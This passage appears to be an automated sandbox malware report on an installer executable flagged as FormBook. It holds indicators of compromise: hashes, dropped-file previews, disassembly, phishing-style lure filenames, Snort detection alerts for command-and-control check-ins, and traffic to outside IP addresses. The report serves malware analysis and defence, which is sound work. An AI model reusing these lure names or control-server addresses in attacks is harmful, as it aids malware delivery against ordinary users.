                                                                              http://174.143.146.246/~cosmo/vfghv.htmlGet hashmaliciousBrowse
                                                                              • 174.143.146.246
                                                                              http://rs112.zol.co.zwGet hashmaliciousBrowse
                                                                              • 66.216.86.92
                                                                              c7dh0AJEXM.exeGet hashmaliciousBrowse
                                                                              • 23.253.126.58
                                                                              https://kmwconstruction.com/Get hashmaliciousBrowse
                                                                              • 174.143.65.160
                                                                              http://kmwconstruction.comGet hashmaliciousBrowse
                                                                              • 174.143.65.160
                                                                              CLOUDFLARENETUSPURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                                              • 172.67.172.17
                                                                              Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                              • 172.67.188.154
                                                                              CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                                              • 172.67.172.17
                                                                              Halkbank_Ekstre_20210223_082357_541079.exeGet hashmaliciousBrowse
                                                                              • 172.67.188.154
                                                                              quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                                              • 172.67.172.17
                                                                              FOB offer_1164087223_I0133P2100363812.PDF.exeGet hashmaliciousBrowse
                                                                              • 104.21.19.200
                                                                              PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                                              • 172.67.188.154
                                                                              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                              • 172.67.160.246
                                                                              Yao Han Industries 61007-51333893QR001U,pdf.exeGet hashmaliciousBrowse
                                                                              • 172.67.188.154
                                                                              PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
                                                                              • 172.67.172.17
                                                                              ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                              • 23.227.38.74
                                                                              (appproved)WJO-TT180,pdf.exeGet hashmaliciousBrowse
                                                                              • 104.21.19.200
                                                                              purchase order.exeGet hashmaliciousBrowse
                                                                              • 172.67.188.154
                                                                              9073782912,pdf.exeGet hashmaliciousBrowse
                                                                              • 172.67.188.154
                                                                              SOS URGENT RFQ #2345.exeGet hashmaliciousBrowse
                                                                              • 104.21.19.200
                                                                              INV_PR2201.docmGet hashmaliciousBrowse
                                                                              • 162.159.134.233
                                                                              XP 6.xlsxGet hashmaliciousBrowse
                                                                              • 172.67.172.17
                                                                              b0PmDaDeNh.dllGet hashmaliciousBrowse
                                                                              • 104.20.184.68
                                                                              PO_210222.exeGet hashmaliciousBrowse
                                                                              • 23.227.38.74
                                                                              Sw5kF7zkty.exeGet hashmaliciousBrowse
                                                                              • 162.159.134.233

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dllORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll523JHfbGM1.exeGet hashmaliciousBrowse
                                                                                  TAk8jeG5ob.exeGet hashmaliciousBrowse
                                                                                    PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                      ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                        Orderoffer.exeGet hashmaliciousBrowse
                                                                                          Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                            INV_PR2201.docmGet hashmaliciousBrowse
                                                                                              CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                                                Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                  #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                    Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                                                                                      quote.exeGet hashmaliciousBrowse
                                                                                                        Order83930.exeGet hashmaliciousBrowse
                                                                                                          Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                                                                            Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                                                                              GPP.exeGet hashmaliciousBrowse
                                                                                                                OrderSuppliesQuote0817916.exeGet hashmaliciousBrowse
                                                                                                                  ACCOUNT DETAILS.exeGet hashmaliciousBrowse
                                                                                                                    Quotation.com.exeGet hashmaliciousBrowse
                                                                                                                      Unterlagen PDF.exeGet hashmaliciousBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Temp\gnozo.to
                                                                                                                        Process:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):164352
                                                                                                                        Entropy (8bit):7.998821656833136
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:3072:fUg86Ct0w2hlcy7em7/58mdrJqnEFSgbo11gctxilAYhY8Bck+oUgnsBOZwATntw:fUGq0w2PcyaIeEo11gctwhY8pegsI/za
                                                                                                                        MD5:59AE456E24441D5E7F9F4D2DFF1DD1EB
                                                                                                                        SHA1:8BA26F46F1A65A49868400743D436655925978BD
                                                                                                                        SHA-256:B51CFCEAB1182BC387D9D9BFEE94F63568BDBB6053EADD8F16EFA13AD4F1CF42
                                                                                                                        SHA-512:E9B4E67FA5396CB4735EA0A8820008D15B76327ED4859A5C94CF2701101C8691C729C341BB3878F6E14C1D601BEB9F63BF37374505FD9B628058BAA2B592D792
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: U0..h.v.S.93..T..E....Xn.ne+.....<.bE.h.h^"."..j...\..y0...m..Uz^w..p..%..' .|HAb.2....`....)$T...k(F<.[..r.+.N.a.._.(.3.L.DGI.ot...(....`..........H..,..:.t..p,%..y..,>..{l....d......_.\..).|}".Om.T..{.4(.E..D.e;.y.-.....sT.+..@;.2......<....si....H......~`z."..L.Z^...'./Q.K3..$da...W.3.?7.|f..y..1.n...+u..\...b`...)....u. ....q.:.:.-.M.jm.0.......|.U..|..+...&(..cU...4.v..[..x-,C.W.:......-.a...j8.a.i...1f.-.f:.Y$.._..+....h...a......"..&.`.....8..7@.k}).|.t[..T..v..~>Sh..l..yVw..w....6^....k......0...j.V....j\.V.@g.r{?.\..8..Sy.I...n[/...3.ipw.......!..4....p.........&..!`.~..-.p...".R#...._...V....f@>[....9N.8.%$.3.;xt.. @*ik...M..B.8$.|..o.....,.@8..*...r.W..]%....K.]..|..5m.F_....a.].~.1.e...['.Db?.......2...Q'.@...K|fR...%^.j.W....r...K..``9G..a..k....X...(...\<zY.,........F..Zc..N..n..&.}w{.{.l.f.p`..1.U.o-O...%DW. .5P.u.:s...h..f.Y3e..c....p'..9..3..pU.v.T....2....\.+]...v.^..R.m.=0.........3..w...D..m .:..TvG...IG^d.E...F6.
                                                                                                                        C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll
                                                                                                                        Process:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):6.685010863062865
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:TXpDSLwlu1zjaFBo4T655+7JHmIQ+HWjDDR+:j4P0Xj6kHeF
                                                                                                                        MD5:1C0F964867E07CAC225A8CE5429F5737
                                                                                                                        SHA1:8129559E23C4985E024CD18C42DB54EFFC45B72F
                                                                                                                        SHA-256:41B9F5241987338FAA262090BEAB1ADF4A9821497011BBE87D3A770F2C926666
                                                                                                                        SHA-512:EF6E7764E4B57DFFE5A66C5154FF556802BF94F142070DB2B2B179CB8DF19FB45A176212818FDBA8D6D1994ABF4E2152BBC2BE76757B00D818230CE862A5AD80
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 22%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                                                        Reputation:low
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.N.e.N.e.N.e.N.e.NI..N.e.N..cN.e.N..gN.e.N..dN.e.N..aN.e.NRich.e.N................PE..L....G4`...........!.........&............... ...............................p............@.........................P$..I.... .......P.......................`..d.................................................... ...............................code............................... ....rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll
                                                                                                                        Process:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11776
                                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: 523JHfbGM1.exe, Detection: malicious, Browse
                                                                                                                        • Filename: TAk8jeG5ob.exe, Detection: malicious, Browse
                                                                                                                        • Filename: PAYMENT COPY.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                                                        • Filename: Orderoffer.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious, Browse
                                                                                                                        • Filename: INV_PR2201.docm, Detection: malicious, Browse
                                                                                                                        • Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious, Browse
                                                                                                                        • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                                                                                        • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious, Browse
                                                                                                                        • Filename: Purchase Order___pdf ____________.exe, Detection: malicious, Browse
                                                                                                                        • Filename: quote.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Order83930.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                                                                        • Filename: GPP.exe, Detection: malicious, Browse
                                                                                                                        • Filename: OrderSuppliesQuote0817916.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ACCOUNT DETAILS.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Quotation.com.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Unterlagen PDF.exe, Detection: malicious, Browse
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsx546.tmp
                                                                                                                        Process:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):191414
                                                                                                                        Entropy (8bit):7.87694518740932
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:ta7Ug86Ct0w2hlcy7em7/58mdrJqnEFSgbo11gctxilAYhY8Bck+oUgnsBOZwATT:t8UGq0w2PcyaIeEo11gctwhY8pegsI//
                                                                                                                        MD5:BB7752BBCB8FD3C0AFD1F7247FFE4122
                                                                                                                        SHA1:60ABE13804AF8FC3B8C73512D9D5EF548920804C
                                                                                                                        SHA-256:CA2DACE75E51170F2D464B3DC536C5A65CA234E357C8AB7686073E3D2529BA3B
                                                                                                                        SHA-512:DEDB3C0E7283973927D37F1ACFF4168FEF6222EF061C2ED5A0D8A0B4E1E811F610C2D7FF1F258DBAFA7A6CE0873118C7E222878D75EAE67D62C10667111B9BE2
                                                                                                                        Malicious:false
                                                                                                                        Preview: ........,...................$...............................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.894792410239027
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:lpdKSOB78u.exe
                                                                                                                        File size:217653
                                                                                                                        MD5:f10054d325df455c58ecb16ea660d3f2
                                                                                                                        SHA1:54871af48b64576922b97965efeeea94976bc119
                                                                                                                        SHA256:b060cb81afd9113cfbbb1e346c99e503c545da47ed80096c021b7ca41c064c76
                                                                                                                        SHA512:4ea16d3dbae5b9746aeea79d180b7f1a8932ca8c64bfc95dce1d22376d1d0eada03db8033c1f59212837befa4dc35ad285b1dfc5b6d57d2eda402f968f4b2117
                                                                                                                        SSDEEP:6144:K11Q2tLhQtI6Vjw2PcyaseEo11+ctwhY8pggsIPj1ur:QFgNhri1jWhYlg/Pjm
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@

                                                                                                                        File Icon

                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x403486
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                        Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 00000184h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                        mov dword ptr [esp+10h], 0040A130h
                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                        call dword ptr [004080B0h]
                                                                                                                        call dword ptr [004080C0h]
                                                                                                                        and eax, BFFFFFFFh
                                                                                                                        cmp ax, 00000006h
                                                                                                                        mov dword ptr [0042F44Ch], eax
                                                                                                                        je 00007F73D894C073h
                                                                                                                        push ebx
                                                                                                                        call 00007F73D894F1EEh
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F73D894C069h
                                                                                                                        push 00000C00h
                                                                                                                        call eax
                                                                                                                        mov esi, 004082A0h
                                                                                                                        push esi
                                                                                                                        call 00007F73D894F16Ah
                                                                                                                        push esi
                                                                                                                        call dword ptr [004080B8h]
                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                        jne 00007F73D894C04Dh
                                                                                                                        push 0000000Bh
                                                                                                                        call 00007F73D894F1C2h
                                                                                                                        push 00000009h
                                                                                                                        call 00007F73D894F1BBh
                                                                                                                        push 00000007h
                                                                                                                        mov dword ptr [0042F444h], eax
                                                                                                                        call 00007F73D894F1AFh
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F73D894C071h
                                                                                                                        push 0000001Eh
                                                                                                                        call eax
                                                                                                                        test eax, eax
                                                                                                                        je 00007F73D894C069h
                                                                                                                        or byte ptr [0042F44Fh], 00000040h
                                                                                                                        push ebp
                                                                                                                        call dword ptr [00408038h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [00408288h]
                                                                                                                        mov dword ptr [0042F518h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 00429878h
                                                                                                                        call dword ptr [0040816Ch]
                                                                                                                        push 0040A1ECh

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x994.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x65ad0x6600False0.675628063725data6.48593060343IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x80000x13800x1400False0.4634765625data5.26110074066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0xa0000x255580x600False0.470052083333data4.21916068772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x380000x9940xa00False0.459375data4.33293034177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_DIALOG0x381480x100dataEnglishUnited States
                                                                                                                        RT_DIALOG0x382480x11cdataEnglishUnited States
                                                                                                                        RT_DIALOG0x383640x60dataEnglishUnited States
                                                                                                                        RT_VERSION0x383c40x290MS Windows COFF PA-RISC object fileEnglishUnited States
                                                                                                                        RT_MANIFEST0x386540x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                                                        SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                                                        ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                        USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                                                        Version Infos

                                                                                                                        DescriptionData
                                                                                                                        LegalCopyrightCopyright Nyangbara
                                                                                                                        FileVersion28.32.13.56
                                                                                                                        CompanyNameSungkai
                                                                                                                        LegalTrademarksTemplate Method Pattern
                                                                                                                        Commentscolostrum
                                                                                                                        ProductNameKalumpang
                                                                                                                        FileDescriptioncode of ethics
                                                                                                                        Translation0x0409 0x04e4

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        02/23/21-09:19:35.940804TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.323.224.206.45
                                                                                                                        02/23/21-09:19:35.940804TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.323.224.206.45
                                                                                                                        02/23/21-09:19:35.940804TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.323.224.206.45
                                                                                                                        02/23/21-09:19:41.421806TCP1201ATTACK-RESPONSES 403 Forbidden804974034.102.136.180192.168.2.3
                                                                                                                        02/23/21-09:19:52.076121TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:19:52.076121TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:19:52.076121TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:19:52.215911TCP1201ATTACK-RESPONSES 403 Forbidden804974734.102.136.180192.168.2.3
                                                                                                                        02/23/21-09:19:57.363088TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.3104.21.76.239
                                                                                                                        02/23/21-09:19:57.363088TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.3104.21.76.239
                                                                                                                        02/23/21-09:19:57.363088TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.3104.21.76.239
                                                                                                                        02/23/21-09:20:13.180762TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:20:13.180762TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:20:13.180762TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:20:13.319901TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.3
                                                                                                                        02/23/21-09:20:23.514893TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:20:23.514893TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:20:23.514893TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.334.102.136.180
                                                                                                                        02/23/21-09:20:23.654359TCP1201ATTACK-RESPONSES 403 Forbidden804975334.102.136.180192.168.2.3

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Feb 23, 2021 09:19:17.709605932 CET4971380192.168.2.3154.213.108.250
                                                                                                                        Feb 23, 2021 09:19:18.057991982 CET8049713154.213.108.250192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:18.058134079 CET4971380192.168.2.3154.213.108.250
                                                                                                                        Feb 23, 2021 09:19:18.058295012 CET4971380192.168.2.3154.213.108.250
                                                                                                                        Feb 23, 2021 09:19:18.408178091 CET8049713154.213.108.250192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:18.414952040 CET8049713154.213.108.250192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:18.415133953 CET4971380192.168.2.3154.213.108.250
                                                                                                                        Feb 23, 2021 09:19:18.415177107 CET4971380192.168.2.3154.213.108.250
                                                                                                                        Feb 23, 2021 09:19:18.764971972 CET8049713154.213.108.250192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:23.588922024 CET4971580192.168.2.33.223.115.185
                                                                                                                        Feb 23, 2021 09:19:23.717184067 CET80497153.223.115.185192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:23.717315912 CET4971580192.168.2.33.223.115.185
                                                                                                                        Feb 23, 2021 09:19:23.717447996 CET4971580192.168.2.33.223.115.185
                                                                                                                        Feb 23, 2021 09:19:23.844760895 CET80497153.223.115.185192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:23.844916105 CET4971580192.168.2.33.223.115.185
                                                                                                                        Feb 23, 2021 09:19:23.844980001 CET4971580192.168.2.33.223.115.185
                                                                                                                        Feb 23, 2021 09:19:23.973321915 CET80497153.223.115.185192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:29.781888008 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:29.945908070 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:29.945982933 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:29.946145058 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:30.150914907 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.277334929 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.277365923 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.277400970 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.277434111 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:30.354926109 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.354985952 CET4972280192.168.2.3208.91.197.27
                                                                                                                        Feb 23, 2021 09:19:30.439970970 CET8049722208.91.197.27192.168.2.3
                                                                                                                        Feb 23, 2021 09:19:30.461776972 CET4972280192.168.2.3208.91.197.27
